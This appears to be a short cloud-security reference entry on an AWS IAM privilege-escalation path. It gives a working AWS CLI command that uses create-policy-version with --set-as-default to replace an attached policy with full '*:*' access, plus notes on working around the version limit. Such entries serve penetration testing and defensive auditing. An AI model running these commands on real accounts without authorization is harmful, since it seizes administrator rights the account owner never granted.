A managed policy keeps up to five versions, one marked default. iam:CreatePolicyVersion with --set-as-default publishes a new version and activates it in one call, so if you can edit any managed policy already attached to your principal, you rewrite it to allow everything.
Grant full access#
cat > admin.json <<'EOF'
{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}
EOF
aws iam create-policy-version \
--policy-arn arn:aws:iam::<acct>:policy/<attached-policy> \
--policy-document file://admin.json --set-as-default
Your principal now holds *:* because the edited policy is attached to it.
Exploitation notes#
- Target a customer-managed policy already attached to you; AWS-managed policies cannot be edited.
- If five versions already exist, delete a non-default one first (
delete-policy-version), then create. SetAsDefaultis the key flag; without it the permissive version exists but is inactive, which is the SetDefaultPolicyVersion case.
Tools#
- AWS CLI (
iam create-policy-version). - Pacu (
iam__privesc_scan): detects and performs this path.